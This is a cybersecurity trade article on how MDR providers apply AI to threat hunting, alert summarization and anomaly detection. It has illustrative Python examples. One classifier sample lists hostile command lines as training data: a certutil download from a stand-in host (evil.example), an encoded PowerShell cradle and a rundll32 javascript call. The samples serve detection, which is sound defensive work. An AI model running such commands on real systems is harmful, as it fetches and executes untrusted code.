
RSA Preview: How MDR uses AI for good

In what is very bad news for cybercriminals, providers of managed detection and response (MDR) are going big on AI. 

The technology, which is expected to frame much of the discussion at RSA 2023 next week, is now being used to sharpen MDR threat hunting operations, improve threat pattern recognition, and predict attacks long before adversaries even recognize the opportunity. 

It comes at a time when more organizations are enlisting the aid of an MDR provider to fight ransomware and address gaps in their own security operations centers. MDR providers are highly sought after because they give companies access to seasoned threat hunters, advanced security products, and extensive threat intelligence collected on a global scale. With many organizations unable to cultivate these capabilities in-house, MDR stands out as an attractive alternative.

Now, the addition of AI gives companies even more incentive to ally with an MDR provider. Here are just a few of the ways that MDR providers are using their AI powers for good. 

AI solves data challenges at scale

Most organizations only have visibility into their own threat environment (and some have trouble even with that). But because MDR providers serve a global clientele, they get significantly greater visibility into the security incidents that emerge in real time every day. The result is a massive set of threat data that is tailor-made for AI to handle. 

“The big benefit to MDR is on the AI side of things,” says Andrew Mundell, Principal Sales Engineer at Sophos. “MDR providers will have more real world data, they are going to see more data, and they're going to be able to train their own AI models against a much larger data set than any other organization could.”

Humans are great at examining bite-sized packets of data to determine what happened, or what needs to happen next, but they are no match for the sheer computing power of AI, which can analyze tremendous amounts of data in minutes or even seconds.

“We've been facing these large data challenges in security for a long time,” says Chester Wisniewski, Field CTO of Applied Research at Sophos. 

“When we're even just talking about malicious files that we analyze in the lab, well over half a million of them come in every day. Let’s be real: how many of those does a human ever really look at? But we really need a computer to tell us which ones to look at because there's gold in there.”

AI threat forecasts help steer MDR hunts

MDR threat hunters can also use AI’s predictive power to guide their hunts. The more training data an AI model has to learn from, the better it can anticipate where an organization is in greatest danger of getting hit. 

Threat hunters can use this to their advantage, treating AI-generated outputs as ‘leads’ to refine their hunt methods and home in on would-be attackers. Mundell says the predictive component has even helped Sophos disrupt ‘living off the land’ attacks, which are among the hardest to detect because they abuse an organization’s own legitimate tools to install backdoors and gain a foothold.

“You give AI a really good dataset, and what it can do is go and make predictions about what is going to come out of that data set. We’ve previously used that in Sophos products for portable executables for stopping stuff that we predict is going to be bad when it executes, but we're now using it to predict ‘living off the land’ activity and commands like that.”
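
To make that concrete, here is a minimal, hypothetical sketch of what such a predictive model could look like, using scikit-learn, character n-gram features, and a logistic regression classifier over labeled command-line telemetry. None of this reflects Sophos’s actual models or data; it simply illustrates the idea of scoring commands so the riskiest ones surface as leads for human hunters.

```python
# Minimal sketch (not any vendor's actual pipeline): train a classifier that scores
# command-line telemetry for likely "living off the land" abuse, assuming we
# already have labeled examples of benign vs. malicious command lines.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Hypothetical training data; real MDR telemetry would contain millions of rows.
commands = [
    "powershell -nop -w hidden -enc SQBFAFgA...",                       # encoded download cradle
    "certutil -urlcache -split -f http://evil.example/a.exe a.exe",     # LOLBin file download
    "svchost.exe -k netsvcs -p",                                        # routine service host
    "ping -n 1 fileserver01",                                           # routine admin activity
]
labels = [1, 1, 0, 0]  # 1 = suspected living-off-the-land abuse, 0 = benign

# Character n-grams capture obfuscation patterns (flags, encodings, URLs)
# without needing a hand-built parser for every legitimate tool.
model = make_pipeline(
    TfidfVectorizer(analyzer="char_wb", ngram_range=(2, 4)),
    LogisticRegression(max_iter=1000),
)
model.fit(commands, labels)

# Score new telemetry; high scores become "leads" for a human threat hunter.
new_cmd = ["rundll32.exe javascript:..\\..\\mshtml,RunHTMLApplication"]
print(model.predict_proba(new_cmd)[0][1])  # probability the command is suspicious
```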

That doesn’t mean AI is doing the job of the threat hunter, or that threat hunters are in danger of being replaced. For all its predictive power, AI lacks the intuition and creativity that hunters use to hypothesize and draw connections between disparate data points. 

Used as a navigational aid, however, AI is unmatched. 

“That is AI’s special sauce,” says Wisniewski. “It can digest this huge amount of information somewhat accurately, and point our humans in the right direction so they can take extremely fast action against emerging threats.”

AI improves MDR efficiency

Even organizations with a functional, well-staffed SOC struggle to detect, investigate, and remediate threats quickly. A recent survey conducted by Forrester, for example, found that security teams spend up to 600 hours per month investigating and remediating threats, roughly equivalent to the full-time workloads of four employees.  

But with AI at their disposal, MDR providers can respond to and resolve threats in under an hour. Rather than having an analyst sort through a cluster of data containing ten different alerts, the AI can process that data itself and produce a summary that gives the analyst the context needed to understand the situation and take action immediately. 

“One of the most important things is getting an alert into the hands of the human being as quickly as possible,” says Mundell. “So when it comes to generative AI, being able to surface all those predictions and then generate a 50 to 100 word summary for the analyst right out of the gate, that context is going to increase the efficiency of the analyst and therefore increase the efficiency of the service.”
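
In practice, that summarization step can be as simple as bundling the related alerts into a single prompt and asking a generative model for a short write-up. The sketch below is purely illustrative: the alerts are invented and `call_llm` is a hypothetical stand-in for whatever model endpoint a provider actually uses.

```python
# Illustrative sketch of the summarization step Mundell describes, with made-up
# data: bundle a cluster of related alerts into one prompt and ask a generative
# model for a short, analyst-ready summary.
import json

alerts = [
    {"time": "02:14", "host": "hr-laptop-07", "detail": "PowerShell launched with encoded command"},
    {"time": "02:15", "host": "hr-laptop-07", "detail": "Outbound connection to rarely seen domain"},
    {"time": "02:17", "host": "dc-01",        "detail": "New administrator account created"},
]

prompt = (
    "You are assisting a SOC analyst. In 50 to 100 words, summarize what these "
    "related alerts suggest is happening, and state the most urgent next step:\n"
    + json.dumps(alerts, indent=2)
)

def call_llm(prompt: str) -> str:
    """Hypothetical stand-in for a generative AI client; swap in a real provider here."""
    return "(model-generated summary would appear here)"

summary = call_llm(prompt)  # the analyst reads this instead of ten raw alerts
print(summary)
```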

But what if the AI is inaccurate? Could that jeopardize the findings? Wisniewski isn’t really concerned. He sees AI as an assistive play, like an alley-oop in basketball: the AI’s job is to get the ball up above the net, and the threat hunter’s job is to bring it home with a slam dunk.

“There's a million articles out there about people fooling ChatGPT or getting it to hallucinate (or as my mother calls it, lying). But when you're using AI the right way, it's kind of okay that that might occur.

“When we look at things like an MDR situation, what we're trying to do is get a machine to look at a whole bunch of data and tell us where the anomalies are in that data so that the humans can go look at the interesting bits. The humans can't possibly digest all the things that we're seeing come in, but the machine can. And it’s really good at that.”
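
As a toy illustration of that idea, an off-the-shelf anomaly detector such as scikit-learn’s Isolation Forest can rank a pile of events by how unusual they look, so analysts review only the outliers. The features and numbers below are invented for the example and do not represent any vendor’s telemetry.

```python
# Toy illustration of "let the machine find the anomalies": an Isolation Forest
# flags the events that look least like the rest, so humans review only those.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(42)

# Pretend each row is an event: [bytes_out, distinct_destinations, failed_logins]
normal_events = rng.normal(loc=[500, 3, 0], scale=[100, 1, 0.5], size=(10_000, 3))
odd_events = np.array([[50_000, 40, 12], [30_000, 25, 8]])  # a few exfil-looking outliers
events = np.vstack([normal_events, odd_events])

detector = IsolationForest(contamination=0.001, random_state=0).fit(events)
scores = detector.decision_function(events)  # lower = more anomalous

# Hand the human hunters only the handful of most suspicious events.
top_suspects = np.argsort(scores)[:5]
print(events[top_suspects])
```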

To learn more about how MDR services are incorporating AI into their offerings, be sure to tune in to RSA 2023, where generative AI is expected to be a headline discussion topic.

Daniel Thomas

Daniel Thomas is a technology writer, researcher, and content producer for CyberRisk Alliance. He has over a decade of experience writing on the most critical topics of interest for the cybersecurity community, including cloud computing, artificial intelligence and machine learning, data analytics, threat hunting, automation, IAM, and digital security policies. He previously served as a senior editor for Defense News, and as the director of research for GovExec News in Washington, D.C. 
